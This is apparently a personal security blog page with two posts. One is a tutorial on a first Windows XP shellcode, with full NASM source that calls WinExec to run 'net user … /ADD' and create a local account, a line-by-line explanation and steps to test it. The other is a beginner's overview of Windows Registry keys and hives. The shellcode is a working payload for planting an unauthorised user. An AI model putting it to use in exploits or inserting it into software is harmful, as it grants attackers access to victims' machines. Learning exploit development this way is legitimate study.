My first shellcode was in two registers, The adduser shellcode!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

I always tried to learn to write simple shellcode in assembly language. But writing the shellcode was not my first interest , my interest was Exploit writing. I had to learn to understand assembly language for various reason such as Understanding how computer works, Effectively use of Debugger, Exploit writing,fun etc. So i searched on Google a lots “Writing shellcode” , Fortunately I found some amazing tutorials(Reference!). I will explain each line of my first shellcode below. Before that i want to tell that what tools i used to write this shellcode:

1. Nasm: www.nasm.us

2. arwin: http://www.vividmachines.com/shellcode/arwin.c

3. xxd-shellcode: http://www.projectshellcode.com/downloads/xxd-shellcode.sh

4. shellcode-test: http://www.vividmachines.com/shellcode/shellcodetest.c

The shellcode:

;add user shellcode. Only will work on windows xp3. Written by pusheax.com 
[BITS 32]

global _start

section .text

_start:
jmp short command


function: ;Label
;WinExec("Command to execute",NULL)
pop ecx
xor eax,eax
push eax
push ecx
mov eax,0x7c8623ad
call eax

xor eax,eax
push eax
mov eax,0x7c81cafa
call eax



command: ;Label
call function
db "cmd.exe /c net user pusheax popebp /ADD"
db 0x00


So let me explain each line

[BITS 32] : Tell the nasm the code is for 32bit.

global _start : Declare main starting label .

section .text : Declare the code section.

jmp short command: jmp instruction used for jumping to another label call “command” . “Call” instruction is not possible because “call” will save then next instruction to stack to get back to next instruction. This is really a common trick when writing shellcode. So it is telling to jump to “command” label and keep no return address in stack.

So now we are in label “command” and it holds following instructions:-

call function : Calling “function” label and saving the next address(whatever) in stack for return purpose . The Next instruction is simple system command:

 db “cmd.exe /c net user pusheax popebp /ADD”

So whatever , we are in label “function” 
There is a simple windows API  we need call is WinExec(), http://msdn.microsoft.com/en-us/library/windows/desktop/ms687393%28v=vs.85%29.aspx  . It only requires two parameter.

pop     ecx : Take the current return address into ecx and remove the address from stack.

xor     eax,eax : cleaning the eax register to 0. We can directly push 0 to stack but clearly it will issue null bytes. So most shellcoder does xor.

push     eax : pushing 0 to stack. Since Stack is LIFO so it will be the last parameters.

push     ecx : Do you remember that we have popped an address into ecx ? ecx actually holding “cmd.exe /c net user pusheax popebp /ADD” . So we need to push this string to stack for WinExec() first parameter. Currently stack holds: WinExec(“cmd.exe /c net user pusheax popebp /ADD”,NULL).

mov     eax,0x7c8623ad :   0x7c8623ad is address of WInExec(). Moving this address into eax . I found this address using arwin.exe ( ./arwin.exe Kernel32.dll WinExec ).

call      eax : eax=WinExec(). So it is executing the API function.

xor    eax,eax: clean eax register. Because we are going to terminate the current process soon. We are going to call ExitProcess() function to exit the current process. otherwise shellcode may get corrupted. You may see it on Debugger. 

 push   eax: Same as above we are pushing the last parameters to stack.

mov     eax,0x7c81cafa : Same as above i used arwin to find the address of ExitProcess() function.

call      eax: eax=ExitProcess’s address. Calling eax will execute the function.

Test

1. nasm -f bin -o shellcode.bin
2. ./xxd-shellcode.sh shellcode.bin
3. paste into the shellcode-test.c:
4. compile with mingw and execute then check the new user name :).

 Reference:

https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

http://projectshellcode.com/node/20

WINDOWS REGISTERY

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

–>

Windows Registry is a database which store all kind of windows system configuration. It store all the configuration about Kernel, Device, User configuration etc.
As a penetration tester or a advanced system administrator we need to have a clean understanding of Windows Registry. Because often times we need to configure the system manually. That is why I am going to explain the basic of windows Registry which i learned from various resource and experience and self-taught.
How the Registry deal with windows system:
  • The Boot configuration stored in Windows registry. Whenever the Windows system boot it first read all the configuration from registry hive then load into memory . The Next turn of Kernel!
  • When the Kernel start Initializing , it first read other configuration such as Devices configuration.
  • Then it start reading other required configuration such as Users configuration, Wallpaper, Screen saver etc.
There are many information is stored in registry. Keeping all information in one registry is horrible. There are different structure for each registry, here are few of them:
REG_NONE == NONE VALUE
REG_SZ == UNICODE STRING
REG_BINARY == BINARY DATA
REG_DWORD == 32 bit NUMBER (Double Word Number)
REG_DWORD_BIG_ENDIAN == A DWORD value, a 32-bit unsigned integer
REG_LINK == Symbolic Link
REG_FULL_RESOURCE_DESCRIPTION== Hardware Description
REG_QWORD == 64 bit Number
And The ROOT KEYS:
  • HKEY_CLASS_ROOT
  • HKEY_CURRENT_USER
  • HKEY_LOCAL_MACHNE
  • HKEY_USERS
  • HKEY_CURRENT_CONFIG
Let’s Explain these root keys below,
HKEY_CLASS_ROOT:Abbreviated HKCR, HKEY_CLASSES_ROOT contains information about registered applications, such as file associations and OLE Object Class IDs, tying them to the applications used to handle these items
HKEY_CURRENT_USER:
Here all the configuration of currently logged in users is stored.
There are 12th Subkey under the KKEY_CURRENT_USER:
AppEvents == Sound/Event
Console == Windows setting such as Scree color, width, Font size etc
Control Panel == Wallpaper, screensaver, mouse etc. Screenshot:
Environment == Environment variable definitions
EUDC ==
Identities ==
Keyboard Layout == Keyboard Layout (I.E U.S)
Network == Network Driver Setting
Printers == Printer Connection setting
Software == User-specific software information
System ==
Volatile Environment ==
HKEY_LOCAL_MACHINE:
In this root key all the system configuration is stored, such as HARDWARE, SAM, SOFTWARE,Computer name etc is stored in this root key:
Maleware,Backdoor,Keylogger and other malicious software also target this key.
HKEY_USERS:
HKEY_USERS contains subkeys corresponding to the HKEY_CURRENT_USER keys for each user profile actively loaded on the machine, though user hives are usually only loaded for currently logged-in users
If logged in as “weird science” then I can see there is a subkey :
and :
KEY_CURRENT_CONFIG:
Perhaps don’t need to explain it. If you still want to know about it then please search on Google. 🙂
Hives :
Microsoft(copied and pasted): A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data.

Each time a new user logs on to a computer, a new hive is created for that user with a separate file for the user profile. This is called the user profile hive. A user’s hive contains specific registry information pertaining to the user’s application settings, desktop, environment, network connections, and printers. User profile hives are located under the HKEY_USERSkey More : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724877%28v=vs.85%29.aspx

Next I will explain some security task in Windows registry when I will have some security related work in registry, Hope it will be soon 🙂 . Stay tune !
Feel Free post your any questions related of windows registry! 🙂
Reference: